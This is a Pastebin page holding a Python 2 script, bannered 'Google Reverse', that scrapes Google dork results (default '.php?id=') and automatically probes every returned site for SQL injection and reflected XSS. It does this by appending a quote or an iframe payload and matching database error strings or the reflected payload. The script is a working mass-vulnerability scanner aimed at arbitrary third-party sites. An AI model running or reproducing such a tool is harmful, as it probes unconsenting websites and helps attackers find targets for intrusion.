Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #! /usr/bin/python2
- #encoding:utf-8;
- import urllib,sys,re,requests
- from optparse import OptionParser
- print '''\033[32m
- ____ _
- / ___| ___ ___ __ _| | ___
- | | _ / _ \ / _ \ / _` | |/ _ \
- |=========\033[31m\033[0;0m [\033[31m REVERSE\033[0;0m ]\033[32m ========|
- | |_| | (_) | (_) | (_| | | __/
- \____|\___/ \___/ \__, |_|\___|
- |___/
- Google + Proxy
- \033[0;0m'''
- parser = OptionParser()
- parser.add_option("-t", "--term", dest="term", default=".php?id=", help="Term to search", metavar="FILE")
- parser.add_option("-s", "--sqli", action="store_true", dest="sqli", default=False, help="Scanear por SQL Injection")
- parser.add_option("-x", "--xss", action="store_true", dest="xss", default=False, help="Scanear por XSS")
- parser.add_option("-r", "--regex", dest="regex", default=False, help="pesquisar expressões regulares em cada página")
- parser.add_option("--show", "--show", action="store_true", dest="show", default=False, help="Exibir URLS")
- (options, args) = parser.parse_args()
- term=options.term
- url="http://www.google.com/search?q=%s&num=100"%urllib.quote(term)
- text=requests.get(url).text
- urls=re.findall("<h3 class=\"r\"><a href=\"/url\?q=(.*?)\&",text)
- print len (urls)
- if options.sqli:
- for i in urls:
- i= urllib.unquote(i)
- try:
- text=requests.get(i+"'").text
- if re.search ("error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch​_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error",text):
- print "\033[32m",i,"\033[0;0m - SQLI"
- else:
- print i,"NO SQLI"
- except Exception, ex:
- pass
- if options.xss:
- xss="<iframe src=\"http://xss/\" \">"
- for i in urls:
- i= urllib.unquote(i)
- try:
- text=requests.get(i+xss).text
- if xss in text:
- print "\033[32m",i,"\033[0;0m - XSS"
- else:
- print i,"NO XSS"
- except Exception, ex:
- pass
- if options.regex:
- print ' Using regular expression:'+options.regex+'\n'
- for i in urls:
- try:
- text=requests.get(i).text
- print urllib.unquote(i)+':'
- for r in re.findall(options.regex,text):
- print r
- print ''
- except Exception, ex:
- print 'Erro em '+i+str(ex)
- elif options.show:
- print '\n'.join(urls)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement